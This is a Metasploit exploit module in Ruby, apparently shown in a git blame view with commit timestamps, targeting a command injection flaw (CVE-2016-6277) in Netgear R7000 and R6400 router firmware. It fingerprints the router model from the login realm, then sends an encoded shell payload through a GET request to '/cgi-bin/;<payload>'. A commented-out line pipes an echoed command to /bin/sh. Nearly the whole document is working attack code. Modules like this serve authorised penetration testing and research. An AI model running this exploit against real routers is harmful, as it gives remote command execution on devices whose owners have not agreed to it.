2017-02-16 03:33:48 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Netgear R7000 and R6400 cgi-bin Command Injection",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an arbitrary command injection vulnerability in
|
|
|
|
Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => 'unix',
|
|
|
|
'Author' => ['thecarterb', 'Acew0rm'],
|
|
|
|
'DefaultTarget' => 0,
|
|
|
|
'Privileged' => false,
|
|
|
|
'Arch' => [ARCH_CMD],
|
|
|
|
'Targets' => [
|
|
|
|
[ 'Automatic Target', { } ]
|
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'EDB', '40889'],
|
|
|
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
|
|
|
|
[ 'URL', 'https://www.kb.cert.org/vuls/id/582384'],
|
|
|
|
[ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],
|
|
|
|
[ 'CVE', '2016-6277']
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Dec 06 2016',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 1024,
|
2017-02-17 23:29:46 +00:00
|
|
|
'DisableNops' => true,
|
2017-02-18 05:15:45 +00:00
|
|
|
'BadChars' => "\x20"
|
2017-02-16 03:33:48 +00:00
|
|
|
}
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80)
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def scrape(text, start_trig, end_trig)
|
|
|
|
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
|
|
|
|
end
|
2017-02-16 03:39:16 +00:00
|
|
|
|
2017-02-16 03:33:48 +00:00
|
|
|
# Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected
|
|
|
|
def check
|
|
|
|
res = send_request_cgi({'uri'=>'/'})
|
|
|
|
if res.nil?
|
|
|
|
fail_with(Failure::Unreachable, 'Connection timed out.')
|
|
|
|
end
|
|
|
|
# Checks for the `WWW-Authenticate` header in the response
|
|
|
|
if res.headers["WWW-Authenticate"]
|
|
|
|
data = res.to_s
|
2017-02-16 13:38:06 +00:00
|
|
|
marker_one = "Basic realm=\"NETGEAR "
|
2017-02-16 03:33:48 +00:00
|
|
|
marker_two = "\""
|
|
|
|
model = scrape(data, marker_one, marker_two)
|
|
|
|
vprint_status("Router is a NETGEAR router (#{model})")
|
2017-02-16 13:38:06 +00:00
|
|
|
if model == 'R7000' || model == 'R6400'
|
|
|
|
print_good("Router may be vulnerable (NETGEAR #{model})")
|
2017-02-16 03:33:48 +00:00
|
|
|
return CheckCode::Detected
|
|
|
|
else
|
|
|
|
return CheckCode::Safe
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_error('Router is not a NETGEAR router')
|
|
|
|
return CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2017-02-18 05:15:45 +00:00
|
|
|
check
|
|
|
|
|
|
|
|
pe = payload.encoded
|
|
|
|
pe.to_s
|
|
|
|
pe.gsub!('{','')
|
|
|
|
pe.gsub!('}','')
|
|
|
|
|
|
|
|
#cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
|
|
|
|
#str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
|
2017-02-16 03:33:48 +00:00
|
|
|
|
2017-02-16 13:38:06 +00:00
|
|
|
print_status('Sending encoded command...')
|
2017-02-18 05:15:45 +00:00
|
|
|
vprint_status("Encoded command: #{pe}")
|
|
|
|
send_request_cgi({
|
|
|
|
'uri' => "/cgi-bin/;#{pe}",
|
|
|
|
'method' => 'GET'
|
|
|
|
})
|
2017-02-16 03:33:48 +00:00
|
|
|
|
2017-02-16 13:38:06 +00:00
|
|
|
print_status('Giving the handler time to run...')
|
2017-02-16 03:33:48 +00:00
|
|
|
handler
|
|
|
|
|
2017-02-17 23:29:46 +00:00
|
|
|
sleep(10)
|
2017-02-16 03:33:48 +00:00
|
|
|
end
|
|
|
|
end
|